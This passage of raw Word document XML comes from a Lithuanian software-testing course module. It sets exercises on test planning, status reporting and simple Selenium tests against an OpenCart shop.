      </w:r>
      <w:r w:rsidR="000C20B1" w:rsidRPr="00AD4464">
        <w:t>lis testuotojas. Pateikite:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000C20B1" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>- planuojam</w:t>
      </w:r>
      <w:r w:rsidR="00FD0D6C" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ų testavimo atvejų sąrašą;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000C20B1" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>- testams atlikti rei</w:t>
      </w:r>
      <w:r w:rsidR="00FD0D6C" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kalingų testinių duomenų sąrašą;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000C20B1" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>- išankstinių salygų reikalingų testavimui pradėti sąrašą ir laik</w:t>
      </w:r>
      <w:r w:rsidR="00FD0D6C" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ą, kada jos turi būti įvykdytos;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00FD0D6C" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>- pakomentuokite prioritetus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000C20B1" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> b) Įsivaizduokite, kad dabar yra antroji testavimo diena. Pateikite testavimo būsenos ataskaitą, apimančią:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000C20B1" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>- kiek viso yra testų;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000C20B1" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>- kiek testų yra ivykdytų</w:t>
      </w:r>
      <w:r w:rsidR="00FD0D6C" w:rsidRPr="00AD4464">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00684867" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>Kiek iš jų</w:t>
      </w:r>
      <w:r w:rsidR="00F34B4D" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> turi būseną</w:t>
      </w:r>
      <w:r w:rsidR="000C20B1" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> “PASSED”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000C20B1" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>Kiek</w:t>
      </w:r>
      <w:r w:rsidR="00F34B4D" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> jų turi būseną</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> “FAILED”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000C20B1" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>Kiek jų turi būseną “NOT RUN”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000C20B1" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>- Pakomentuokite rezultatus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00626123" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Funkcionalumas, kuris bus pateiktas testavimui po </w:t>
      </w:r>
      <w:r w:rsidR="00985A82" w:rsidRPr="00AD4464">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t> dienų:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003B4BB9" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Vartotojas gali sukurti paskyrą bet kuriuo metu;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003B4BB9" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Vartotojas gali pradėti visapusiškai naudotis sukurta paskyra tik po</w:t>
      </w:r>
      <w:r w:rsidR="00FD0D6C" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> to, kai pasitvirtins savo el. p</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">ašto adresą. Tą padaryti jis turi 24 </w:t>
      </w:r>
      <w:r w:rsidR="00E36B66" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>valandas</w:t>
      </w:r>
      <w:r w:rsidR="004B634E" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003B4BB9" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Jei vartotojas nepasitvirtina paskyros per 12 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">valandų nuo paskyros sukūrimo, jis gaus priminimą nurodytu el. pašto adresu, kad jo paskyra bus ištrinta po </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>12 valand</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ų.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003B4BB9" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Jei vartot</w:t>
      </w:r>
      <w:r w:rsidR="00FD0D6C" w:rsidRPr="00AD4464">
        <w:t>ojas patvirtina el. p</w:t>
      </w:r>
      <w:r w:rsidR="006A48DD" w:rsidRPr="00AD4464">
        <w:t>ašto adresą</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>, jo paskyra yra pilnai aktyvuojama;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003B2567" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Jei vartotojas nepasitvirtina </w:t>
      </w:r>
      <w:r w:rsidR="003B4BB9" w:rsidRPr="00AD4464">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00FD0D6C" w:rsidRPr="00AD4464">
        <w:t>. p</w:t>
      </w:r>
      <w:r w:rsidR="003B4BB9" w:rsidRPr="00AD4464">
        <w:t>ašto adreso, po 24 valand</w:t>
      </w:r>
      <w:r w:rsidR="003B4BB9" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ų jo paskyra ištrinama iš sistemos. Tokiu atveju vartotojas turi registruotis (kurti paskyrą) iš nau</w:t>
      </w:r>
      <w:r w:rsidR="00111C54" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidR="003B4BB9" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>o.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:widowControl w:val="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00111C54" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="125" w:name="_Toc14392433"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Kompetencija. Kurti ir vykdyti nesudėtingus automatinius testus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
      <w:r w:rsidR="00511545">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00111C54"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bookmarkStart w:id="126" w:name="_Hlk14111376"/>
      <w:bookmarkStart w:id="127" w:name="_Toc14392434"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Mokymosi rezultatas. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Diegti ir valdyti automatinio testavimo įrankius.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C32D54" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00AB2B99" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB2B99" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00AB2B99" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ĮVADAS Į AUTOMATINĮ TESTAVIMĄ</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C03">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F566A7" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Pasinaudodami Selenium IDE įskiepio galimybėmis, įrašykite testą, atliekanti tokius veiksmus:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B37748" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">naviguoja į OpenCart el. parduotuvę (dėl nuorodos kreiptis </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>į dėstytoją</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="004B634E" w:rsidRPr="00AD4464">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004B634E" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>pasirenka IPhone telefoną;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B37748" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:lastRenderedPageBreak/>
        <w:t>patikrina, ar tai tikrai tas telefonas</w:t>
      </w:r>
      <w:r w:rsidR="004B634E" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> pagal pavadinimą;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B37748" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>pasirenka du vienetus ir prideda į krepše</w:t>
      </w:r>
      <w:r w:rsidR="004B634E" w:rsidRPr="00AD4464">
        <w:t>lį;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B37748" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>atidaro krepšelį ir patikrina, kad ten yra pirkinys bei mokėtiną sumą;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B37748" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>paspaudžia pirkimo mygtuką (checkout);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B37748" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>išvalo krepšelio turinį;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B37748" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>grįžta į pradinį puslapį.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B37748" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išsaugokite testą, bei įsitikinkite, kad jis gali būti vykdomas pakartotinai</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C03">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B64934" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="009F51F7" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="009F51F7" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Susipažinti su automatinių testų sąvoka. Suprasti, kuo skiriasi automatiniai testai nuo įprastų. Išmokti įrašinėti testus naudojant Selenium IDE įrankį (naršyklės įskiepį).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009F51F7" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F566A7" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B37748" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>AUTOMATIZAVIMO APLINKOS PARUOŠIMAS</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C03">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0058528B" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Naudodamiesi paskaitų medžiaga parsisiųskite, susidėkite ir sukonfigūruokite programinę įrangą, reikalingą automatinių testų kūrimui:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0058528B" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Junit, TestNG, Java, Selenium WebDriver, Maven, Eclipse, Matcher, JDK, Maven plugin for Eclipse, Hamcrest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B64934" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="0080277C" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0080277C" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Išmokti paruošti aplinką automatinių testų kūrimui. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B37748" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A10615" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>AUTOMATINIŲ TESTŲ KŪRIMO PAGRINDAI</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C03">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C239DA" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Parašykite nesudėtingus Selenium testus opencart e-parduotuvei, kurie:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C239DA" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>- pridėtų kelia</w:t>
      </w:r>
      <w:r w:rsidR="006E77D7" w:rsidRPr="00AD4464">
        <w:t>s prekes į krepšelį;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C239DA" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>- nunaviguotų į krepšelį ir patikrintų, ar tos prekės tikrai ten yra;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C239DA" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>- patikrintų mokėtiną sumą</w:t>
      </w:r>
      <w:r w:rsidR="006E77D7" w:rsidRPr="00AD4464">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D94996" w:rsidP="00372B3A">
